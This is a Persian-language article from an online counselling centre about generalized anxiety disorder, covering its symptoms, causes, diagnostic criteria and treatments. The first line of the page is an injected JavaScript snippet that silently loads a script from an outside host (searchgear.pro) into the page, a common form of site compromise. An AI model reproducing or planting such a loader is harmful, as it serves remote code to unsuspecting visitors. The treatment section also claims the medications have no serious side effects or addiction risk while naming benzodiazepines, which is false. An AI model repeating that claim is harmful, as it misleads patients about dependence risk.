;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); اختلال اضطراب فراگیر علائم و درمان اضطراب منتشر | مرکز مشاوره آنلاین روان‌یاری
اختلال اضطراب فراگیر

اختلال اضطراب فراگیر علائم و درمان اضطراب فراگیر

میزان پیشرفت خواندن شما

فهرست مطالب
مقدمه

اضطراب بخشی طبیعی از زندگی است. هر فردی در زندگی روزمره می تواند نگران مسائل مختلفی باشد. مشکلات شغلی، سلامتی، پول، فرزندان و خانواده می توانند بسیاری از افراد را نگران کنند. در واقع اضطراب به ما کمک می کند تا برای مقابله با مشکلات روزمره آماده باشیم و در مواقع خطر تصمیمات سریع بگیریم. به طور معمول، این نوع اضطراب خفیف و قابل کنترل است. با این حال، گاهی اوقات اضطراب به شکل دیگری اتفاق می افتد و خارج از کنترل می شود. در این حالت ما با اختلال اضطراب فراگیر (اضطراب منتشر) مواجه هستیم.

اختلال اضطراب فراگیر چیست؟

اضطراب در روانشناسی به عنوان نگرانی شناخته می شود. در واقع، اضطراب سیگنالی است که در موقعیت های خطرناک به بدن می گوید برای رویدادی که رخ خواهد داد آماده باشد. هنگامی که افراد شروع به احساس اضطراب طبیعی و ضروری می کنند، تنفس و ضربان قلب تند می شود و اکسیژن بیشتری به ماهیچه ها می رساند.

با توجه به طبیعت انسان، بدن شروع به هوشیاری می کند تا خود را برای موقعیت های خطرناک آماده کند. به لطف این احساسات که همان اضطراب طبیعی هستند، بدن ما به موقعیت های خطرناک زندگی واکنش نشان می دهد.

افراد مبتلا به اختلال اضطراب فراگیر یا اختلال GAD، اضطراب ثابت، بیش از حد و نامناسب دارند. نگرانی بیش از حد بر زندگی روزمره افراد تأثیر منفی می گذارد و حتی آن ها را از ادامه فعالیت های معمول زندگی خود باز می دارد. این افراد در هر موقعیتی به بدترین نتیجه ممکن فکر می کنند، همه چیز از کنترل آن ها خارج است، هیچ امکان خوبی برای آن ها وجود ندارد یا برگشتی ممکن نیست.

نگرانی و اضطراب بیش از حد در اختلال GAD اغلب با مسائلی مانند سلامتی، خانواده، پول یا کار مرتبط هستند. حالت غیرقابل کنترل اضطراب حداقل به مدت شش ماه به شکل روزانه وجود دارد و در طول روز ادامه پیدا می کند. این اضطرابی که افراد احساس می کنند با احساس اضطراب و ترس همراه است و با اضطرابی که هر فرد در مواجه با یک موقعیت منفی احساس می کند، متفاوت می باشد.

اضطراب در اینجا بسیار زیاد است و اساساً دلیلی برای نگرانی وجود ندارد. با این حال، افراد مبتلا به اختلال اضطراب فراگیر در ترس و اضطراب زندگی می کنند و فکر می کنند که هر لحظه یک رویداد یا فاجعه منفی برای آن ها اتفاق می افتد.

دلیل اختلال اضطراب فراگیر

علائم اختلال اضطراب فراگیر

اضطراب منتشر، چه دلیل داشته باشد و چه بدون دلیل باشد، علامت اصلی بیماری است. در اکثر مواقع فرد می داند که نگرانی هایش بیش از حد است، اما نمی تواند نگرانی های خود را کنترل کند و آرام نمی گیرد. خستگی، عدم توجه و مشکل در تمرکز، مبهوت شدن با کوچکترین سر و صدا، نداشتن خواب راحت و بیدار شدن مکرر در شب از دیگر علائم مهم اختلال اضطراب منتشر است.

اضطراب GAD می تواند باعث بروز علائم و دردهای جسمانی شود.  طوری که فرد احساس می کند به یک بیماری فیزیکی مبتلا شده است. این علائم جسمانی و فیزیکی مانند خستگی بی دلیل، سردرد و درد عضلانی، مشکل در بلع، لرزش و پرش، تعریق، عدم تحمل، حالت تهوع، خواب آلودگی و گرگرفتگی است.

  چرا در زندگی احساس بی تفاوتی می کنیم؟

اختلال اضطراب GAD با اختلالات خلقی نیز همراه می باشد. بدبینی، بی قراری، احساسات منفی و… می توانند از جمله اختلالات خلقی باشند.

اختلال اضطراب فراگیر چگونه رخ می دهد؟

استرس نقش مهمی در ایجاد اضطراب منتشر دارد. این اضطراب که بین دوران کودکی و جوانی شروع می شود، رشد آهسته و تدریجی دارد. در واقع ابتدا علائم بیماری بهبود پیدا می کنند اما بعدها فرد به تشدید دوره ای بیماری مبتلا می شود. علائم اغلب زمانی بدتر می شوند که رویدادهای استرس زا در زندگی رخ می دهند. «عوامل ارثی، تغییرات نوروشیمی مغز، ویژگی های شخصیتی و رویدادهای استرس زای زندگی» در شکل گیری این بیماری موثر هستند. بیماران اضطراب منتشر، اغلب به دلیل علائم جسمی مانند خستگی، تنش، درد عضلانی و سردرد به پزشکان غیر روانپزشک مراجعه می کنند و ممکن است تشخیص صحیح و درمان مناسب آن ها به تعویق بیفتد.

اضطراب منتشر

درمان اختلال اضطراب فراگیر یا منتشر

اختلال اضطراب GAD یک بیماری قابل درمان است. اولین کاری که باید انجام دهید، این است که با یک روانپزشک مشورت کنید. علاوه بر یک ارزیابی جامع روانپزشکی در اولین پذیرش، برخی معاینات برای درک اینکه آیا این علائم ناشی از بیماری جسمی است یا خیر، انجام خواهد شد.

اکثر بیماران مبتلا به GAD که تحت درمان قرار می گیرند، از درمان نتیجه می گیرند. روان درمانی یا درمان دارویی می تواند برای این نوع اختلال مناسب باشد. روش های ترکیبی دارویی و روان درمانی نیز می توانند برای درمان اضطراب فراگیر مناسب باشند. بهتر است پزشک شما تصمیم بگیرد که کدام نوع درمان برای شما مناسب است.

در درمان اضطراب GAD از داروهای ضد افسردگی و ضد اضطراب استفاده می شود. از این داروها برای درمان افسردگی و سایر اختلالات اضطرابی نیز استفاده می شود. درمان های دارویی، درمان سریع اضطراب و تنش هستند. داروهای مورد استفاده در درمان، عوارض جانبی جدی و خطرات اعتیاد ندارند. داروهای گروه بنزودیازپین که برای تسکین اضطراب GAD استفاده می شوند، با نسخه تجویز می شوند. این گروه از داروها تنها زمانی می توانند به طور مؤثر و ایمن استفاده شوند که با “دوز و مدت زمان توصیه شده توسط پزشک” مورد استفاده قرار بگیرند.

روش دیگری که در درمان اختلال اضطراب فراگیر مورد استفاده قرار می گیرد، آرامش درمانی است. این روش درمانی، روشی موثر برای کاهش احساس اضطراب و ترس و داشتن خلق و خوی آرام تر است. علاوه بر این روش درمانی، فعالیت هایی مانند مدیتیشن و یوگا برای کاهش اثرات اختلال اضطراب منتشر مفید هستند.

نکات مهم در درمان دارویی اختلال اضطرابی

  • اثر درمان دارویی تا چند هفته شروع نمی شود.
  • مصرف دارو باید تا رفع کامل علائم ادامه یابد.
  • پس از بهبودی کامل، درمان باید حداقل یک سال دیگر ادامه داشته باشد.

افراد مبتلا به اضطراب فراگیر نمی توانند به خود کمک کنند و به نگرانی ادامه می دهند، حتی اگر بدانند چیزی برای نگرانی وجود ندارد و آن ها بیش از حد واکنش نشان می دهند.

اضطراب GAD

علل شایع اختلال اضطراب منتشر

اضطراب فراگیر یک اختلال اضطرابی با علل ناشناخته است. کارشناسانی که در این زمینه تحقیق می کنند، چنین نظری دارند که انتقال ژنتیکی، عوامل محیطی، عوامل بیولوژیکی و ساختار شخصیتی در بروز اختلال اضطراب منتشر موثر هستند.

  هورمون استرس

یکی از عواملی که باعث اختلال اضطراب فراگیر می شود، انتقال ژنتیکی است. خطر ابتلا به این نوع اختلال، در افرادی که دارای اختلال اضطرابی در خانواده خود هستند، به خصوص در بستگان درجه یک خود، بسیار بیشتر است.

یکی دیگر از علل اضطراب منتشر، عوامل بیولوژیکی است. عدم تعادل در ترشح سروتونین مغز و ناتوانی پایانه های عصبی در هدایت صحیح سروتونین، باعث اختلال اضطراب GAD می شوند.

حوادث آسیب زا مانند تصادف، مرگ، سوء استفاده، طلاق می تواتند باعث اختلال اضطراب منتشر در افراد شوند. علاوه بر این، این واقعیت که افراد دارای ساختار شخصیتی مستعدی برای اضطراب هستند، نیز می تواند در ابتلا به اضطراب منتشر تاثیر داشته باشد.

اختلال اضطراب GAD چگونه تشخیص داده می شود؟

  • معیارهای DSM-5 برای تشخیص اختلال اضطراب فراگیر
  • اضطراب بیش از حد در مورد موقعیت ها و رویدادها در بسیاری از روزهای هفته در عرض شش ماه
  • مشکل در کنترل احساسات
  • ناتوانی در کنترل حالت اضطراب و علائم جسمانی که در نتیجه این حالت ایجاد می شوند
  • عدم توانایی تمرکز بر زندگی، تجربه منفی در روابط اجتماعی
  • اضطراب غیر قابل توضیح

جمع بندی

اضطراب GAD یک استرس خارج از کنترل است که متاسفانه سایر جنبه های زندگی فرد را تحت تاثیر قرار می دهد. این اضطراب باعث مشکلات خلقی، جسمانی و روانی می شود. برای درمان این اختلال می توان از آرامش درمانی، دارو درمانی یا روان درمانی کمک گرفت.در مرکز مشاوره آنلاین روان یاری می تواند برای درمان اختلال اضطراب فراگير، از خدمات مشاوره فردی آنلاين استفاده نماييد.

3/5 - (1 امتیاز)

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.